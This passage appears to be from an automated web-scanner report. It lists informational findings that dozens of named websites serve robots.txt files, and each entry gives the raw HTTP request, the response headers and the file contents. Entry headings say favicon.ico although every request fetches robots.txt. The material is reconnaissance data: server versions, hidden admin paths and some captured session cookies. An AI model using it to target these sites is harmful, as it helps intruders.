Accept-Ranges: bytes
ETag: "505b788d3687cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:16:09 GMT
Connection: close
Content-Length: 253

###############################
#
#
User-agent: *
#
# list folders robots are not allowed to index
#
Disallow: /
#
# list specific files robots are not allowed to index
#
#Disallow: /direc
...[SNIP]...
30.297. http://www.mental-health-matters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mental-health-matters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mental-health-matters.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 19 Apr 2011 12:10:48 GMT
ETag: "1c70001-12f-4a14466008200"
Accept-Ranges: bytes
Content-Length: 303
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 00:33:12 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.298. http://www.mexconnect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mexconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mexconnect.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:16 GMT
Status: 200 OK
Last-Modified: Wed, 25 Nov 2009 01:09:24 GMT
Content-Type: text/plain
Content-Length: 23
Cache-Control: max-age=60
Expires: Mon, 02 May 2011 00:15:16 GMT
Connection: close

User-agent: *
Allow: /
30.299. http://www.michiganmessenger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michiganmessenger.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michiganmessenger.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:40 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 17:07:08 GMT
ETag: "1b70e4c-271-4a170c5748700"
Accept-Ranges: bytes
Content-Length: 625
Connection: close
Content-Type: text/plain

# Google Image
User-agent: Googlebot-Image
Disallow:
Allow: /*

# Google AdSense
User-agent: Mediapartners-Google*
Disallow:
Allow: /*

# digg mirror
User-agent: duggmirror
Disallow: /

User-agent: *

...[SNIP]...
30.300. http://www.microchip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microchip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microchip.com

Response

HTTP/1.0 200 OK
Content-Length: 397
Content-Type: text/plain
Content-Location: http://www.microchip.com/robots.txt
Last-Modified: Fri, 13 Nov 2009 20:05:21 GMT
Accept-Ranges: bytes
ETag: "c5711da19c64ca1:9375"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:25:14 GMT
Connection: close

User-agent: Baiduspider
Disallow:
Crawl-delay: 120
User-agent: Googlebot
Disallow:
Crawl-delay: 120
User-agent: Slurp
Disallow:
Crawl-delay: 120
User-agent: YahooSeeker
Disallow:
Crawl-
...[SNIP]...
30.301. http://www.mihomepaper.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mihomepaper.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mihomepaper.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:15 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 15:28:11 GMT
ETag: "f00000017dd5b-9e2-48d65aa12bbc7"
Accept-Ranges: bytes
Content-Length: 2530
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.302. http://www.milwaukee.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milwaukee.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.milwaukee.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 15 Apr 2010 20:29:04 GMT
Accept-Ranges: bytes
ETag: "0683d4adadcca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:48:24 GMT
Connection: close
Content-Length: 81

User-agent: *
Disallow: /display/components/Blocks
Disallow: /*?*PrintPage=yes*
30.303. http://www.moroccanoil.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moroccanoil.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moroccanoil.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:21:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Apr 2011 14:52:34 GMT
ETag: "300003e7-130-4a0cdf57a1080"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.304. http://www.mrsdash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrsdash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mrsdash.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/plain
Content-Location: http://www.mrsdash.com/robots.txt
Last-Modified: Fri, 15 Apr 2011 16:31:20 GMT
Accept-Ranges: bytes
ETag: "07c28d8afbcb1:261"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:08:51 GMT
Connection: close

User-agent: *
Disallow: /print/*
Disallow: *?scid*
Disallow: *?cfid*
Disallow: /user-reviews/*

Sitemap: http://www.mrsdash.com/sitemap.xml
30.305. http://www.mst.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mst.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mst.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:44 GMT
Server: Apache/2.2.17 (Fedora)
Vary: Host
Last-Modified: Thu, 10 Jan 2008 19:47:48 GMT
ETag: "365ce-6b-443637bff6100"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain; charset=UTF-8

# go away
User-agent: *
Disallow: /local_config/
Disallow: /Site_config/
Disallow: /Content_Repository/
30.306. http://www.mumsnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mumsnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mumsnet.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:53:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8b PHP/5.2.11 Resin/3.1.3
Last-Modified: Fri, 24 Dec 2010 02:48:41 GMT
ETag: "23a802b-1b1-4981f061fd440"
Accept-Ranges: bytes
Content-Length: 433
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /test/
Disallow: /Pub?call=com.mumsnet.surveys
Disallow: /stats/
Disallow: /discounts
Disallow: /lw/state.html
Disallow: /ginaford
Disallow: /ReportTalkPost
Disallow: /InTouch

...[SNIP]...
30.307. http://www.muschealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.muschealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.muschealth.com

Response

HTTP/1.1 200 OK
Content-Length: 1499
Content-Type: text/plain
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=49938954;expires=Wed, 24-Apr-2041 00:39:42 GMT;path=/
Set-Cookie: CFTOKEN=9eedac82dd664577-AE25793A-23AE-EC0F-20000B8A6D7D4EE6;expires=Wed, 24-Apr-2041 00:39:42 GMT;path=/
Set-Cookie: SESESSIONID=D028C80F2427DFF2341960D8A44F52F2;path=/
Set-Cookie: SESESSIONCODE=ED78F37371089A8F4EF150A15EBDFD48;path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:39:41 GMT
Connection: keep-alive
Set-Cookie: NSC_tjuffyfd-fyu=ffffffff831fd44345525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 15:39:41 GMT;path=/

# robots.txt for http://www.muschealth.com/
# Last mod: 2009/11/11 10:19 AM


User-agent: *
Disallow: /gs/UserControls/
Disallow: /cds/UserControls/
Disallow: /ActiveCalendar
Disallow: /Active
...[SNIP]...
30.308. http://www.museum.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.museum.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.museum.tv

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:17 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 06 Apr 2011 11:08:42 GMT
ETag: "d290828-7c-3fa6280"
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi
30.309. http://www.musicoutfitters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musicoutfitters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.musicoutfitters.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:46 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Fri, 26 Dec 2008 20:29:48 GMT
ETag: "13e481a-121-45ef8fc8dc79c"
Accept-Ranges: bytes
Cache-Control: max-age=14400, public
Expires: Mon, 02 May 2011 03:35:46 GMT
Content-Length: 289
Age: 0

User-Agent: FDSE
Disallow: /images/
Disallow: /cgi-bin/
Disallow: /cgibin/
Disallow: /artists/songs/
Disallow: /artists/images/
Disallow: /_private/
Disallow: /_vti_bin/
Disallow: /_vti_cnf/
Disallow:
...[SNIP]...
30.310. http://www.myfoxboston.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfoxboston.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfoxboston.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Mon, 02 May 2011 00:03:27 GMT
ETag: "59004a-b7-4a23fc0bb91c0"
Content-Type: text/plain
Date: Mon, 02 May 2011 00:44:06 GMT
Content-Length: 183
Connection: close

User-agent: *
Sitemap: http://www.myfoxboston.com/sitemap_myfoxboston.xml
Sitemap: http://www.myfoxboston.com/feedServlet?obfType=GOOGLE_NEWS_SITEMAPS&siteId=1006
Disallow: /search
30.311. http://www.myfoxchicago.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfoxchicago.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfoxchicago.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Sun, 01 May 2011 00:00:49 GMT
ETag: "8c0165-ba-4a22b99794e40"
Content-Type: text/plain
Date: Sun, 01 May 2011 23:03:49 GMT
Content-Length: 186
Connection: close

User-agent: *
Sitemap: http://www.myfoxchicago.com/sitemap_myfoxchicago.xml
Sitemap: http://www.myfoxchicago.com/feedServlet?obfType=GOOGLE_NEWS_SITEMAPS&siteId=1010
Disallow: /search
30.312. http://www.mylearningplan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylearningplan.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Apr 2008 19:45:08 GMT
Accept-Ranges: bytes
ETag: "03ad0887aa5c81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT
Connection: close
Content-Length: 479

User-agent: *
Disallow: /DistrictAdmin/
Disallow: /Docs/
Disallow: /BB/
Disallow: /CCTest/
Disallow: /EMail/
Disallow: /HowTo/
Disallow: /Help/
Disallow: /images/
Disallow: /include/
Disallo
...[SNIP]...
30.313. http://www.mylovedpee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedpee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedpee.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:10:25 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 10 Nov 2009 13:38:01 GMT
ETag: "19b80a5-50-4af96cb9"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedpee.com/sitemap.xml
30.314. http://www.mylovedspy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedspy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedspy.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:51:49 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Sat, 14 Nov 2009 09:49:56 GMT
ETag: "20005f-50-4afe7d44"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedspy.com/sitemap.xml
30.315. http://www.mynews.in/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynews.in
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mynews.in

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
Last-Modified: Tue, 28 Sep 2010 07:38:35 GMT
ETag: "2de491c-14d-4914ceeb194c0"
Accept-Ranges: bytes
Content-Length: 333
Connection: close
Content-Type: text/plain

User-agent: Googlebot-news
Disallow: /Blog/
Disallow: /aggregator/
Disallow: /goodies/
Disallow: /blog.php
Disallow: /blog_details.php

User-agent: *
Disallow: /cms/
Disallow: /search/
Disallow: /sear
...[SNIP]...
30.316. http://www.mypearsonstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mypearsonstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mypearsonstore.com

Response

HTTP/1.1 200 OK
Content-Length: 364
Content-Type: text/plain
Last-Modified: Fri, 07 Jan 2011 16:03:11 GMT
Accept-Ranges: bytes
ETag: "0792e6284aecb1:fb8d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:33 GMT
Connection: close

# $Header: /WWW/Commonality/robots.txt 2 3/05/04 7:59a Mhanger $

User-agent: *

Disallow: /affiliates
Disallow: /articles/printerfriendly.asp*
Disallow: /authorfirst
Disallow: /cart
Disa
...[SNIP]...
30.317. http://www.myregistry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myregistry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myregistry.com

Response

HTTP/1.1 200 OK
Content-Length: 492
Content-Type: text/plain
Last-Modified: Mon, 13 Apr 2009 20:20:00 GMT
Accept-Ranges: bytes
ETag: "a261da3875bcc91:4a71"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:28:52 GMT
Connection: close

User-agent: Googlebot-Image

User-agent: *
Disallow: /FacebookCompare/
Disallow: /a/
Disallow: /Members/
Disallow: /absolutenl/
Disallow: /Agents/
Disallow: /App_Browsers/
Disallow: /App_Glob
...[SNIP]...
30.318. http://www.myrtlebeach-resorts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrtlebeach-resorts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myrtlebeach-resorts.com

Response

HTTP/1.1 200 OK
Content-Length: 313
Content-Type: text/plain
Content-Location: http://www.myrtlebeach-resorts.com/robots.txt
Last-Modified: Tue, 29 Mar 2011 17:14:21 GMT
Accept-Ranges: bytes
ETag: "c11979be34eecb1:12e4e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:48:47 GMT
Connection: close

User-agent: *
Sitemap: http://www.myrtlebeach-resorts.com/sitemap.xml
Disallow: http://www.myrtlebeach-resorts.com/3resorts.html
Dsiallow: http://www.myrtlebeach-resorts.com/coralbeach@gotomyrtle.c
...[SNIP]...
30.319. http://www.mytattoogallery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytattoogallery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytattoogallery.com

Response

HTTP/1.1 200 OK
Content-Length: 126
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 22:41:58 GMT
Accept-Ranges: bytes
ETag: "0bf955dd51ca1:316"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:46:29 GMT
Connection: close

User-agent: *
Disallow: /images/spacer.gif
Disallow: /ct.html
Disallow: /sd/
Disallow: /st.aspx
Disallow: /ct/ct.aspx

30.320. http://www.mytelus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytelus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytelus.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 07:06:52 GMT
Server: Netscape-Enterprise/3.6 SP3
Content-type: text/plain
Etag: "414c05-4b-3f256498"
Last-modified: Mon, 28 Jul 2003 17:59:52 GMT
Content-length: 75
Accept-ranges: bytes
Connection: close
Set-Cookie: BIGipServermt-fe-proxies=1590405312.20480.0000; expires=Mon, 02-May-2011 04:50:54 GMT; path=/

User-agent: *
Disallow: /internet/consolidatedbilling
Disallow: /local-cgi
30.321. http://www.nartube.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nartube.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nartube.net

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:38:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...
30.322. http://www.ncgenweb.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncgenweb.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ncgenweb.us

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:15 GMT
Server: Apache
Last-Modified: Thu, 04 Mar 2010 00:44:07 GMT
Accept-Ranges: bytes
Content-Length: 182
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: FreeFind
allow:

User-agent: Googlebot
allow:

User-agent: msnbot
allow:

User-agent: PicoSearch/1.0
allow:

User-agent: *
allow: /

User-agent: *
Disallow: /dogsnc/tp
30.323. http://www.ndsmcobserver.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndsmcobserver.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ndsmcobserver.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:37 GMT
Server: Apache
Last-Modified: Wed, 05 Jan 2011 21:48:00 GMT
ETag: W/"26-1294264080000"
Content-Length: 26
Age: 1787
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.324. http://www.newenglandmoves.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newenglandmoves.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:18 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Sat, 01 May 2010 07:02:46 GMT
ETag: "a6710-14e-48582f2731743"
Accept-Ranges: bytes
Content-Length: 334
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.325. http://www.nflgridirongab.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nflgridirongab.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nflgridirongab.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:45:10 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-jkmkfeml=064D93A647533D784AE6B3A9154391FC; path=/
Last-Modified: Sat, 05 Mar 2011 13:25:18 GMT
Content-Length: 289

Sitemap: http://www.nflgridirongab.com/sitemap.xml

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /author/
Di
...[SNIP]...
30.326. http://www.nhregister.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhregister.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nhregister.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sun, 01 May 2011 23:30:16 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Last-Modified: Tue, 22 Feb 2011 20:22:43 GMT
Real-Hostname: nhregister.com
Content-Length: 1366
Connection: close
X-Cache-Info: cached

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebo
...[SNIP]...
30.327. http://www.nikonrumors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nikonrumors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nikonrumors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Mon, 09 Feb 2009 02:18:11 GMT
Accept-Ranges: bytes
Content-Length: 820
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 10
Disallow: /cgi-bin
Disallow: /license.txt/
Disallow: /readme.html
Disallow: /wp-admin.php
Disallow: /wp-atom.php
Disallow: /wp-commentsrss2.php
Disallow: /wp-feed.php
Dis
...[SNIP]...
30.328. http://www.ntb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ntb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ntb.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 03 Sep 2010 20:02:18 GMT
Accept-Ranges: bytes
ETag: "013ce9a24bcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:48:26 GMT
Connection: close
Content-Length: 254

User-agent: *
Allow: /Tire*
Allow: /Wheels
Allow: /Services
Allow: /Locations
Allow: /Promotions
Allow: /Site Map
Disallow: /app_offline.htm
Disallow: /App_offline.htm
Disallow: /*?ID=My-Chec
...[SNIP]...
30.329. http://www.numerologist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.numerologist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.numerologist.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:10:17 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 22:21:15 GMT
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding
Cache-Control: max-age=604800
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /cgi-bin/
30.330. http://www.nursing-jobs.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nursing-jobs.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nursing-jobs.us

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:23 GMT
Server: Apache
Last-Modified: Sat, 30 Jan 2010 04:21:12 GMT
Accept-Ranges: bytes
Content-Length: 79
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /apply/
Disallow: /templates/
Disallow: /templates_c/
30.331. http://www.onlinemoneystash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinemoneystash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinemoneystash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:13 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php
30.332. http://www.onlinetextmessage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinetextmessage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinetextmessage.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:08 GMT
Server: Apache
Last-Modified: Wed, 20 Jun 2007 03:22:59 GMT
ETag: "aa81ee-17-4334df2644ac0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
30.333. http://www.onlocationvacations.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlocationvacations.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlocationvacations.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
Content-Type: text/plain; charset=UTF-8
Date: Mon, 02 May 2011 00:52:42 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-jhoibjei=5B4A6E8D19E41287044378FB3CA99E82; path=/
Last-Modified: Tue, 17 Nov 2009 23:55:14 GMT
Content-Length: 23

User-agent: *
Disallow:
30.334. http://www.organicgardening.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.organicgardening.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.organicgardening.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.5
